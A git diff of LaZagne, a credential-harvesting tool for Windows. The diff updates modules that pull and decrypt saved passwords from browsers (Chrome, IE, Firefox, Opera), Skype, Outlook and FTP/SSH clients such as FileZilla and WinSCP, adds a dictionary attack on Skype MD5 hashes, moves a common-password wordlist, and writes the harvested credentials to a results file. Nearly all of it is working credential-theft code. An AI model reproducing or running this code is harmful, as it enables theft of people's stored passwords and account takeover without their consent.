# --------------------------- End of output functions --------------------------- \ No newline at end of file +from constant import constant from time import gmtime, strftime import os, getpass, socket import logging from config.header import Header from colorama import init, Fore, Back, Style init() # init the colorama function # --------------------------- Functions used to write --------------------------- def write_header(): time = strftime("%Y-%m-%d %H:%M:%S", gmtime()) header = '''|====================================================================|\r\n | |\r\n | Credentsials discovery |\r\n | |\r\n | ! BANG BANG ! |\r\n | |\r\n |====================================================================|\r\n\r\n - Date: ''' + time + '''\n\r - Username: ''' + getpass.getuser() + ''' \r\n - Hostname: ''' + socket.gethostname() + ''' \r\n\r\n ------------------------------ Results ------------------------------\r\n\r\n''' open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(header) def write_footer(): footer = '\n[+] %s passwords have been found.\r\n\r\n' % str(constant.nbPasswordFound) open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(footer) def write_credentials(pwdFound, category): tmp = "############ %s passwords ############\r\n\r\n" % category for pwd in pwdFound: for p in pwd.keys(): tmp = str(tmp) + str(p) + ": " + str(pwd[p]) + "\r\n" tmp = str(tmp) + "\r\n" open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(tmp) def checks_write(values, category): if values: if constant.output == 'txt': try: write_credentials(values, category) logging.info('[+] Credentials stored successfully on the file: %s\\credentials.txt\n' % constant.folder_name) except: logging.info('Couldn\'t write the results file\n') # --------------------------- End of functions used to write --------------------------- # --------------------------- Output functions --------------------------- def print_footer(): footer = '\n[+] %s passwords have been found.\n' % str(constant.nbPasswordFound) if logging.getLogger().isEnabledFor(logging.INFO) == False: footer += 'For more information launch it again with the -v option\n' logging.info(footer) # print output if passwords have been found def print_output(software_name, pwdFound, title1 = False): if pwdFound: # if the debug logging level is not apply => print the title if logging.getLogger().isEnabledFor(logging.INFO) == False: if not title1: Header().title(software_name) toWrite = [] password_category = False for pwd in pwdFound: # detect which kinds of password has been found lower_list = [s.lower() for s in pwd.keys()] password = [s for s in lower_list if "password" in s] if password: password_category = password else: key = [s for s in lower_list if "key" in s] # for the wifi if key: password_category = key else: hash = [s for s in lower_list if "hash" in s] if hash: password_category = hash # No password found if not password_category: print_debug("FAILED", "Password not found !!!") else: print_debug("OK", '%s found !!!' % password_category[0].title()) toWrite.append(pwd) # Store all passwords found on a table => for dictionary attack if master password set constant.nbPasswordFound += 1 try: constant.passwordFound.append(pwd[password_category[0]]) except: pass for p in pwd.keys(): print '%s: %s' % (p, pwd[p]) print # write credentials into a text file checks_write(toWrite, software_name) else: logging.info("[!] No passwords found\n") def print_debug(error_level, message): # print when password is found if error_level == 'OK': print Fore.GREEN + message + Style.RESET_ALL # print when password is not found elif error_level == 'FAILED': print Style.BRIGHT + Fore.RED + message + Style.RESET_ALL # print messages depending of their criticism elif error_level == 'CRITICAL': logging.critical(Style.BRIGHT + Fore.RED + '[CRITICAL] %s\n' % message + Style.RESET_ALL) elif error_level == 'ERROR': logging.error(Style.BRIGHT + Fore.RED + '[ERROR] %s\n' % message + Style.RESET_ALL) elif error_level == 'WARNING': logging.warning(Fore.CYAN + '[WARNING] %s\n' % message + Style.RESET_ALL) elif error_level == 'DEBUG': logging.debug('[DEBUG] %s\n' % message) elif error_level == 'INFO': logging.info('%s\n' % message) else: logging.info('[%s] %s' % (error_level, message)) # --------------------------- End of output functions --------------------------- \ No newline at end of file diff --git a/Windows/src/LaZagne/laZagne.py b/Windows/src/LaZagne/laZagne.py index 7da41d9f..80900f1c 100644 --- a/Windows/src/LaZagne/laZagne.py +++ b/Windows/src/LaZagne/laZagne.py @@ -45,9 +45,9 @@ def output(): def verbosity(): # write on the console + debug file - if args['verbose']==0: level=logging.INFO - elif args['verbose'] >= 1: level=logging.DEBUG - elif args['verbose']>=2: level=logging.WARNING + if args['verbose']==0: level=logging.CRITICAL + elif args['verbose'] == 1: level=logging.INFO + elif args['verbose']>=2: level=logging.DEBUG FORMAT = "%(message)s" formatter = logging.Formatter(fmt=FORMAT) @@ -55,7 +55,9 @@ def verbosity(): stream.setFormatter(formatter) root = logging.getLogger() root.setLevel(level) - root.handlers = [] + # if other logging are set + for r in root.handlers: + r.setLevel(logging.CRITICAL) root.addHandler(stream) del args['verbose'] diff --git a/Windows/src/LaZagne/softwares/browsers/chrome.py b/Windows/src/LaZagne/softwares/browsers/chrome.py index 5dca2030..21cf4f30 100644 --- a/Windows/src/LaZagne/softwares/browsers/chrome.py +++ b/Windows/src/LaZagne/softwares/browsers/chrome.py @@ -14,7 +14,7 @@ def __init__(self): # main function def run(self): # print title - Header().title_debug('Chrome') + Header().title_info('Chrome') database_path = '' if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ: @@ -38,8 +38,13 @@ def run(self): return # Connect to the Database - conn = sqlite3.connect(database_path) - cursor = conn.cursor() + try: + conn = sqlite3.connect(database_path) + cursor = conn.cursor() + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) + print_debug('ERROR', 'An error occured opening the database file') + return # Get the results try: diff --git a/Windows/src/LaZagne/softwares/browsers/dico.py b/Windows/src/LaZagne/softwares/browsers/dico.py deleted file mode 100644 index c376d191..00000000 --- a/Windows/src/LaZagne/softwares/browsers/dico.py +++ /dev/null @@ -1,505 +0,0 @@ - -def get_dico(): - return [ - "password", - "123456", - "12345678", - "1234", - "qwerty", - "12345", - "dragon", - "pussy", - "baseball", - "football", - "letmein", - "monkey", - "696969", - "abc123", - "mustang", - "michael", - "shadow", - "master", - "jennifer", - "111111", - "2000", - "jordan", - "superman", - "harley", - "1234567", - "fuckme", - "hunter", - "fuckyou", - "trustno1", - "ranger", - "buster", - "thomas", - "tigger", - "robert", - "soccer", - "fuck", - "batman", - "test", - "pass", - "killer", - "hockey", - "george", - "charlie", - "andrew", - "michelle", - "love", - "sunshine", - "jessica", - "asshole", - "6969", - "pepper", - "daniel", - "access", - "123456789", - "654321", - "joshua", - "maggie", - "starwars", - "silver", - "william", - "dallas", - "yankees", - "123123", - "ashley", - "666666", - "hello", - "amanda", - "orange", - "biteme", - "freedom", - "computer", - "sexy", - "thunder", - "nicole", - "ginger", - "heather", - "hammer", - "summer", - "corvette", - "taylor", - "fucker", - "austin", - "1111", - "merlin", - "matthew", - "121212", - "golfer", - "cheese", - "princess", - "martin", - "chelsea", - "patrick", - "richard", - "diamond", - "yellow", - "bigdog", - "secret", - "asdfgh", - "sparky", - "cowboy", - "camaro", - "anthony", - "matrix", - "falcon", - "iloveyou", - "bailey", - "guitar", - "jackson", - "purple", - "scooter", - "phoenix", - "aaaaaa", - "morgan", - "tigers", - "porsche", - "mickey", - "maverick", - "cookie", - "nascar", - "peanut", - "justin", - "131313", - "money", - "horny", - "samantha", - "panties", - "steelers", - "joseph", - "snoopy", - "boomer", - "whatever", - "iceman", - "smokey", - "gateway", - "dakota", - "cowboys", - "eagles", - "chicken", - "dick", - "black", - "zxcvbn", - "please", - "andrea", - "ferrari", - "knight", - "hardcore", - "melissa", - "compaq", - "coffee", - "booboo", - "bitch", - "johnny", - "bulldog", - "xxxxxx", - "welcome", - "james", - "player", - "ncc1701", - "wizard", - "scooby", - "charles", - "junior", - "internet", - "bigdick", - "mike", - "brandy", - "tennis", - "blowjob", - "banana", - "monster", - "spider", - "lakers", - "miller", - "rabbit", - "enter", - "mercedes", - "brandon", - "steven", - "fender", - "john", - "yamaha", - "diablo", - "chris", - "boston", - "tiger", - "marine", - "chicago", - "rangers", - "gandalf", - "winter", - "bigtits", - "barney", - "edward", - "raiders", - "porn", - "badboy", - "blowme", - "spanky", - "bigdaddy", - "johnson", - "chester", - "london", - "midnight", - "blue", - "fishing", - "000000", - "hannah", - "slayer", - "11111111", - "rachel", - "sexsex", - "redsox", - "thx1138", - "asdf", - "marlboro", - "panther", - "zxcvbnm", - "arsenal", - "oliver", - "qazwsx", - "mother", - "victoria", - "7777777", - "jasper", - "angel", - "david", - "winner", - "crystal", - "golden", - "butthead", - "viking", - "jack", - "iwantu", - "shannon", - "murphy", - "angels", - "prince", - "cameron", - "girls", - "madison", - "wilson", - "carlos", - "hooters", - "willie", - "startrek", - "captain", - "maddog", - "jasmine", - "butter", - "booger", - "angela", - "golf", - "lauren", - "rocket", - "tiffany", - "theman", - "dennis", - "liverpoo", - "flower", - "forever", - "green", - "jackie", - "muffin", - "turtle", - "sophie", - "danielle", - "redskins", - "toyota", - "jason", - "sierra", - "winston", - "debbie", - "giants", - "packers", - "newyork", - "jeremy", - "casper", - "bubba", - "112233", - "sandra", - "lovers", - "mountain", - "united", - "cooper", - "driver", - "tucker", - "helpme", - "fucking", - "pookie", - "lucky", - "maxwell", - "8675309", - "bear", - "suckit", - "gators", - "5150", - "222222", - "shithead", - "fuckoff", - "jaguar", - "monica", - "fred", - "happy", - "hotdog", - "tits", - "gemini", - "lover", - "xxxxxxxx", - "777777", - "canada", - "nathan", - "victor", - "florida", - "88888888", - "nicholas", - "rosebud", - "metallic", - "doctor", - "trouble", - "success", - "stupid", - "tomcat", - "warrior", - "peaches", - "apples", - "fish", - "qwertyui", - "magic", - "buddy", - "dolphins", - "rainbow", - "gunner", - "987654", - "freddy", - "alexis", - "braves", - "cock", - "2112", - "1212", - "cocacola", - "xavier", - "dolphin", - "testing", - "bond007", - "member", - "calvin", - "voodoo", - "7777", - "samson", - "alex", - "apollo", - "fire", - "tester", - "walter", - "beavis", - "voyager", - "peter", - "porno", - "bonnie", - "rush2112", - "beer", - "apple", - "scorpio", - "jonathan", - "skippy", - "sydney", - "scott", - "red123", - "power", - "gordon", - "travis", - "beaver", - "star", - "jackass", - "flyers", - "boobs", - "232323", - "zzzzzz", - "steve", - "rebecca", - "scorpion", - "doggie", - "legend", - "ou812", - "yankee", - "blazer", - "bill", - "runner", - "birdie", - "bitches", - "555555", - "parker", - "topgun", - "asdfasdf", - "heaven", - "viper", - "animal", - "2222", - "bigboy", - "4444", - "arthur", - "baby", - "private", - "godzilla", - "donald", - "williams", - "lifehack", - "phantom", - "dave", - "rock", - "august", - "sammy", - "cool", - "brian", - "platinum", - "jake", - "bronco", - "paul", - "mark", - "frank", - "heka6w2", - "copper", - "billy", - "cumshot", - "garfield", - "willow", - "cunt", - "little", - "carter", - "slut", - "albert", - "69696969", - "kitten", - "super", - "jordan23", - "eagle1", - "shelby", - "america", - "11111", - "jessie", - "house", - "free", - "123321", - "chevy", - "bullshit", - "white", - "broncos", - "horney", - "surfer", - "nissan", - "999999", - "saturn", - "airborne", - "elephant", - "marvin", - "shit", - "action", - "adidas", - "qwert", - "kevin", - "1313", - "explorer", - "walker", - "police", - "christin", - "december", - "benjamin", - "wolf", - "sweet", - "therock", - "king", - "online", - "dickhead", - "brooklyn", - "teresa", - "cricket", - "sharon", - "dexter", - "racing", - "penis", - "gregory", - "0000", - "teens", - "redwings", - "dreams", - "michigan", - "hentai", - "magnum", - "87654321", - "nothing", - "donkey", - "trinity", - "digital", - "333333", - "stella", - "cartman", - "guinness", - "123abc", - "speedy", - "buffalo", - "kitty"] - diff --git a/Windows/src/LaZagne/softwares/browsers/ie.py b/Windows/src/LaZagne/softwares/browsers/ie.py index 6f6a6d14..3c6fb976 100644 --- a/Windows/src/LaZagne/softwares/browsers/ie.py +++ b/Windows/src/LaZagne/softwares/browsers/ie.py @@ -58,8 +58,8 @@ def get_hash_table(self, list): try: h = (urls[u] + '\0').encode('UTF-16LE') hash_tables.append([h, hashlib.sha1(h).hexdigest().lower()]) - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return hash_tables def write_binary_file(self): @@ -211,8 +211,8 @@ def get_history(self): urls.append(r) else: break - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) # Unload the dll to delete it later handle = lib._handle # obtain the DLL handle @@ -221,9 +221,9 @@ def get_history(self): # delete the dll os.remove(dll_name) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', 'Browser history failed to load, only few url will be tried') - pass urls.append('https://www.facebook.com/') urls.append('https://www.gmail.com/') @@ -241,7 +241,8 @@ def history_from_regedit(self): try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return [] num = win32api.RegQueryInfoKey(hkey)[1] @@ -249,7 +250,6 @@ def history_from_regedit(self): k = win32api.RegEnumValue(hkey, x) if k: urls.append(k[1]) - return urls def decipher_password(self, cipher_text, u): @@ -261,9 +261,9 @@ def decipher_password(self, cipher_text, u): a = pwd[i:].decode('UTF-16LE') a = a.decode('utf-8') break - except: - result = '' + except Exception,e: pass + result = '' # the last one is always equal to 0 secret = a.split('\x00') @@ -288,17 +288,18 @@ def decipher_password(self, cipher_text, u): pwdFound.append(values) else: password = secret[length - s] - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) def run(self, historic=''): # print title - Header().title_debug('Internet Explorer') + Header().title_info('Internet Explorer') # write the binary file try: self.write_binary_file() - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', '%s cannot be created, check your file permission' % dll_name) list = [] @@ -320,7 +321,8 @@ def run(self, historic=''): failed = False try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) failed = True nb_site = 0 diff --git a/Windows/src/LaZagne/softwares/browsers/mozilla.py b/Windows/src/LaZagne/softwares/browsers/mozilla.py index 5643458b..e8495aeb 100644 --- a/Windows/src/LaZagne/softwares/browsers/mozilla.py +++ b/Windows/src/LaZagne/softwares/browsers/mozilla.py @@ -9,7 +9,7 @@ import sqlite3 import json import shutil -from dico import get_dico +from config.dico import get_dico import itertools from config.header import Header from config.constant import * @@ -156,8 +156,8 @@ def initialize_libnss(self, list_libnss, profile): self.libnss = CDLL(lib) if self.libnss.NSS_Init(profile) == 0: return True - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return False def found_libnss(self): @@ -232,7 +232,8 @@ def save_db(self, userpath): dst_db = relative_path + os.sep + dbname shutil.copyfile(ori_db, dst_db) print_debug('INFO', '%s has been copied here: %s' % (dbname, dst_db)) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', '%s has not been copied' % dbname) try: @@ -241,7 +242,8 @@ def save_db(self, userpath): dst_db = relative_path + os.sep + dbname shutil.copyfile(ori_db, dst_db) print_debug('INFO', '%s has been copied here: %s' % (dbname, dst_db)) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', '%s has not been copied' % dbname) # ------------------------------ Master Password Functions ------------------------------ @@ -283,7 +285,8 @@ def found_masterpassword(self): try: pass_file = open(self.dictionnary_path, 'r') num_lines = sum(1 for line in pass_file) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', 'Unable to open passwords file: %s' % str(self.dictionnary_path)) return 1 pass_file.close() @@ -299,7 +302,8 @@ def found_masterpassword(self): except (KeyboardInterrupt, SystemExit): print 'INTERRUPTED!' print_debug('DEBUG', 'Dictionnary attack interrupted') - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) pass print_debug('WARNING', 'The Master password has not been found using the dictionnary attack') @@ -335,8 +339,8 @@ def found_masterpassword(self): except (KeyboardInterrupt, SystemExit): print 'INTERRUPTED!' print_debug('INFO', 'Dictionnary attack interrupted') - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('WARNING', 'No password has been found using the brute force attack') # ------------------------------ End of Master Password Functions ------------------------------ @@ -358,7 +362,7 @@ def run(self): return # print the title - Header().title_debug(software_name) + Header().title_info(software_name) list_libnss = self.found_libnss() @@ -390,13 +394,15 @@ def run(self): # check if passwors are stored on the Json format try: credentials = JsonDatabase(profile) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) database_find = False if not database_find: # check if passwors are stored on the sqlite format try: credentials = SqliteDatabase(profile) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) database_find = False if database_find: @@ -409,15 +415,14 @@ def run(self): try: # decrypt passwords on the db pwdFound+=self.decrypt(software_name, credentials) - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) # if a master password is set (but not found), we save the db to bruteforce offline elif masterPwd and not masterPwdFound and constant.output == 'txt': self.save_db(profile) self.libnss.NSS_Shutdown() - else: print_debug('ERROR', 'Could not initialize the NSS library\n') diff --git a/Windows/src/LaZagne/softwares/browsers/opera.py b/Windows/src/LaZagne/softwares/browsers/opera.py index 657128d7..ad3f218e 100644 --- a/Windows/src/LaZagne/softwares/browsers/opera.py +++ b/Windows/src/LaZagne/softwares/browsers/opera.py @@ -16,7 +16,7 @@ def __init__(self): def run(self): # print title - Header().title_debug('Opera') + Header().title_info('Opera') # retrieve opera folder path = self.get_path() @@ -134,7 +134,8 @@ def decipher_new_version(self, path): # Get the results try: cursor.execute('SELECT action_url, username_value, password_value FROM logins') - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', 'Opera seems to be used, the database is locked. Kill the process and try again !') return @@ -166,12 +167,14 @@ def masterPasswordUsed(self, path): try: cp.readfp(f) break - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) f.readline() # discard first line try: master_pass = cp.get('Security Prefs','Use Paranoid Mailpassword') return master_pass - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return False diff --git a/Windows/src/LaZagne/softwares/chats/jitsi.py b/Windows/src/LaZagne/softwares/chats/jitsi.py index 06348d8f..06fb83c4 100644 --- a/Windows/src/LaZagne/softwares/chats/jitsi.py +++ b/Windows/src/LaZagne/softwares/chats/jitsi.py @@ -102,7 +102,7 @@ def decrypt_password(self, encrypted_pass): # main function def run(self): # print title - Header().title_debug('Jitsi') + Header().title_info('Jitsi') file_properties = self.get_path() if file_properties == 'Error': diff --git a/Windows/src/LaZagne/softwares/chats/pidgin.py b/Windows/src/LaZagne/softwares/chats/pidgin.py index 5b9af8ed..67014802 100644 --- a/Windows/src/LaZagne/softwares/chats/pidgin.py +++ b/Windows/src/LaZagne/softwares/chats/pidgin.py @@ -12,7 +12,7 @@ def __init__(self): def run(self): # print title - Header().title_debug('Pidgin') + Header().title_info('Pidgin') if 'APPDATA' in os.environ: directory = os.environ['APPDATA'] + '\.purple' diff --git a/Windows/src/LaZagne/softwares/chats/skype.py b/Windows/src/LaZagne/softwares/chats/skype.py index 06e81773..5a5e4ed3 100644 --- a/Windows/src/LaZagne/softwares/chats/skype.py +++ b/Windows/src/LaZagne/softwares/chats/skype.py @@ -7,6 +7,7 @@ from config.write_output import print_output, print_debug from config.header import Header from config.moduleInfo import ModuleInfo +from config.dico import get_dico class Skype(ModuleInfo): def __init__(self): @@ -26,7 +27,8 @@ def get_regkey(self): try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return '' num = win32api.RegQueryInfoKey(hkey)[1] @@ -35,7 +37,8 @@ def get_regkey(self): if k: key = k[1] return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return 'failed' # get hash from configuration file @@ -71,11 +74,19 @@ def get_md5_hash(self, enc_hex, key): # byte to hex return binascii.hexlify(tmp) - + + def dictionary_attack(self, login, md5): + wordlist = get_dico() + for word in wordlist: + hash = hashlib.md5('%s\nskyper\n%s' % (login, word)).hexdigest() + if hash == md5: + return word + return False + # main function def run(self): # print title - Header().title_debug('Skype') + Header().title_info('Skype') if 'APPDATA' in os.environ: directory = os.environ['APPDATA'] + '\Skype' @@ -92,7 +103,7 @@ def run(self): values = {} try: - values['Username'] = d + values['username'] = d # get encrypted hash from the config file enc_hex = self.get_hash_credential(directory + os.sep + d + os.sep + 'config.xml') @@ -101,12 +112,17 @@ def run(self): print_debug('WARNING', 'No credential stored on the config.xml file.') else: # decrypt the hash to get the md5 to brue force - values['Hash_md5'] = self.get_md5_hash(enc_hex, key) - values['shema to bruteforce'] = values['Username'] + '\\nskyper\\n' + values['hash_md5'] = self.get_md5_hash(enc_hex, key) + values['shema to bruteforce'] = values['username'] + '\\nskyper\\n' + # Try a dictionary attack on the hash + password = self.dictionary_attack(values['username'], values['hash_md5']) + if password: + values['password'] = password + pwdFound.append(values) - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) # print the results print_output("Skype", pwdFound) else: diff --git a/Windows/src/LaZagne/softwares/databases/dbvis.py b/Windows/src/LaZagne/softwares/databases/dbvis.py index e274c307..12ceb2e4 100644 --- a/Windows/src/LaZagne/softwares/databases/dbvis.py +++ b/Windows/src/LaZagne/softwares/databases/dbvis.py @@ -111,7 +111,7 @@ def get_mainPath(self): def run(self): # print title - Header().title_debug('Dbvisualizer') + Header().title_info('Dbvisualizer') mainPath = self.get_mainPath() diff --git a/Windows/src/LaZagne/softwares/databases/sqldeveloper.py b/Windows/src/LaZagne/softwares/databases/sqldeveloper.py index c12ebe1c..39b75348 100644 --- a/Windows/src/LaZagne/softwares/databases/sqldeveloper.py +++ b/Windows/src/LaZagne/softwares/databases/sqldeveloper.py @@ -127,7 +127,7 @@ def get_infos(self, path, passphrase, salt): def run(self): # print title - Header().title_debug('SQL Developer') + Header().title_info('SQL Developer') mainPath = self.get_mainPath() if mainPath == 'Error': diff --git a/Windows/src/LaZagne/softwares/databases/squirrel.py b/Windows/src/LaZagne/softwares/databases/squirrel.py index 31bf6f02..292aaf81 100644 --- a/Windows/src/LaZagne/softwares/databases/squirrel.py +++ b/Windows/src/LaZagne/softwares/databases/squirrel.py @@ -47,7 +47,7 @@ def parse_xml(self, xml_file): # Main function def run(self): # print title - Header().title_debug('Squirrel') + Header().title_info('Squirrel') path = self.get_path() if path == 'Not_Found': diff --git a/Windows/src/LaZagne/softwares/mails/outlook.py b/Windows/src/LaZagne/softwares/mails/outlook.py index a82a9002..b62aa405 100644 --- a/Windows/src/LaZagne/softwares/mails/outlook.py +++ b/Windows/src/LaZagne/softwares/mails/outlook.py @@ -11,14 +11,15 @@ def __init__(self): def run(self): # print title - Header().title_debug('Outlook') + Header().title_info('Outlook') accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook' try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('WARNING', 'Outlook not installed.\nAn error occurs retrieving the registry key.\nKey = %s' % keyPath) return @@ -45,7 +46,6 @@ def run(self): # print the results print_output("Outlook", pwdFound) - def retrieve_info(self, hkey, name_key): values = {} num = win32api.RegQueryInfoKey(hkey)[1] @@ -55,15 +55,14 @@ def retrieve_info(self, hkey, name_key): try: password = win32crypt.CryptUnprotectData(k[1][1:], None, None, None, 0)[1] values[k[0]] = password.decode('utf16') - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) values[k[0]] = 'N/A' - pass else: try: values[k[0]] = str(k[1]).decode('utf16') except: values[k[0]] = str(k[1]) - print values return values diff --git a/Windows/src/LaZagne/softwares/svn/tortoise.py b/Windows/src/LaZagne/softwares/svn/tortoise.py index 4ca96e72..9f131507 100644 --- a/Windows/src/LaZagne/softwares/svn/tortoise.py +++ b/Windows/src/LaZagne/softwares/svn/tortoise.py @@ -13,7 +13,7 @@ def __init__(self): # main function def run(self): # print title - Header().title_debug('Tortoise') + Header().title_info('Tortoise') file_path = '' if 'APPDATA' in os.environ: diff --git a/Windows/src/LaZagne/softwares/sysadmin/coreftp.py b/Windows/src/LaZagne/softwares/sysadmin/coreftp.py index a16dbec8..f1c51278 100644 --- a/Windows/src/LaZagne/softwares/sysadmin/coreftp.py +++ b/Windows/src/LaZagne/softwares/sysadmin/coreftp.py @@ -25,7 +25,8 @@ def get_key_info(self): accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE try: key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return False num_profiles = win32api.RegQueryInfoKey(key)[0] @@ -49,14 +50,15 @@ def get_key_info(self): if k[0] == 'PW': try: values['Password'] = self.decrypt(k[1]) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) values['Password'] = 'N/A' # print the results print_output('CoreFTP', pwdFound) def run(self): # print title - Header().title_debug('CoreFTP') + Header().title_info('CoreFTP') if self.get_key_info() == False: print_debug('INFO', 'CoreFTP not installed') diff --git a/Windows/src/LaZagne/softwares/sysadmin/cyberduck.py b/Windows/src/LaZagne/softwares/sysadmin/cyberduck.py index d0b8c260..56c92346 100644 --- a/Windows/src/LaZagne/softwares/sysadmin/cyberduck.py +++ b/Windows/src/LaZagne/softwares/sysadmin/cyberduck.py @@ -46,15 +46,16 @@ def parse_xml(self, xml_file): values['Password'] = password pwdFound.append(values) - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) + # print the results print_output("Cyberduck", pwdFound) # main function def run(self): # print title - Header().title_debug('Cyberduck') + Header().title_info('Cyberduck') path = self.get_path() if path == 'CYBERDUCK_NOT_EXISTS': diff --git a/Windows/src/LaZagne/softwares/sysadmin/filezilla.py b/Windows/src/LaZagne/softwares/sysadmin/filezilla.py index 180257db..c50355ff 100644 --- a/Windows/src/LaZagne/softwares/sysadmin/filezilla.py +++ b/Windows/src/LaZagne/softwares/sysadmin/filezilla.py @@ -1,5 +1,5 @@ import xml.etree.cElementTree as ET -import os +import os, base64 from config.constant import * from config.write_output import print_output, print_debug from config.header import Header @@ -12,7 +12,7 @@ def __init__(self): def run(self): # print title - Header().title_debug('Filezilla') + Header().title_info('Filezilla') if 'APPDATA' in os.environ: directory = os.environ['APPDATA'] + '\FileZilla' @@ -39,8 +39,7 @@ def run(self): pwdFound = [] for i in range(len(interesting_xml_file)): - print_debug('INFO', interesting_xml_file[i]) - print_debug('INFO', info_xml_file[i] + '\n') + print_debug('INFO', '%s: %s' % (interesting_xml_file[i], info_xml_file[i])) xml_file = os.path.expanduser(directory + os.sep + interesting_xml_file[i]) @@ -66,7 +65,15 @@ def run(self): values['Login'] = s11.text if s11.tag == 'Pass': - values['Password'] = s11.text + try: + # if base64 encoding + if 'encoding' in s11.attrib: + if s11.attrib['encoding'] == 'base64': + values['Password'] = base64.b64decode(s11.text) + else: + values['Password'] = s11.text + except: + values['Password'] = s11.text # password found if len(values) != 0: diff --git a/Windows/src/LaZagne/softwares/sysadmin/ftpnavigator.py b/Windows/src/LaZagne/softwares/sysadmin/ftpnavigator.py index b53d2892..fe6427c7 100644 --- a/Windows/src/LaZagne/softwares/sysadmin/ftpnavigator.py +++ b/Windows/src/LaZagne/softwares/sysadmin/ftpnavigator.py @@ -44,11 +44,13 @@ def read_file(self, filepath): def run(self): # print title - Header().title_debug('FTP Navigator') + Header().title_info('FTP Navigator') - path = "C:\\FTP Navigator\\Ftplist.txt" - if os.path.exists(path): - self.read_file(path) - else: - print_debug('INFO', 'Paht %s does not exist.\nFTP Navigator not installed or not found.' % path) + if 'HOMEDRIVE' in os.environ: + path = os.environ.get('HOMEDRIVE') + os.sep + 'FTP Navigator\\Ftplist.txt' + + if os.path.exists(path): + self.read_file(path) + else: + print_debug('INFO', 'Paht %s does not exist.\nFTP Navigator not installed or not found.' % path) diff --git a/Windows/src/LaZagne/softwares/sysadmin/puttycm.py b/Windows/src/LaZagne/softwares/sysadmin/puttycm.py index 9c674fff..a96440c8 100644 --- a/Windows/src/LaZagne/softwares/sysadmin/puttycm.py +++ b/Windows/src/LaZagne/softwares/sysadmin/puttycm.py @@ -13,11 +13,12 @@ def __init__(self): def run(self): # print title - Header().title_debug('Puttycm') + Header().title_info('Puttycm') try: database_path = self.get_default_database() - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('INFO', 'Puttycm not installed') return diff --git a/Windows/src/LaZagne/softwares/sysadmin/winscp.py b/Windows/src/LaZagne/softwares/sysadmin/winscp.py index e802825a..92b02759 100644 --- a/Windows/src/LaZagne/softwares/sysadmin/winscp.py +++ b/Windows/src/LaZagne/softwares/sysadmin/winscp.py @@ -55,7 +55,8 @@ def check_winscp_installed(self): try: key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Configuration\Security', 0, accessRead) return True - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return False def check_masterPassword(self): @@ -72,7 +73,8 @@ def get_logins_info(self): accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE try: key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return False num_profiles = win32api.RegQueryInfoKey(key)[0] @@ -107,7 +109,8 @@ def get_logins_info(self): port = '22' try: password = self.decrypt_password() - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) password = 'N/A' values['Hostname'] = self.get_hostname() @@ -139,7 +142,8 @@ def decrypt_password(self): try: result += chr(int(self.decrypt_char())) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) pass if flag == hex_flag: @@ -151,7 +155,7 @@ def decrypt_password(self): # --------- Main function --------- def run(self): # print title - Header().title_debug('WinSCP') + Header().title_info('WinSCP') if self.check_winscp_installed(): if not self.check_masterPassword(): diff --git 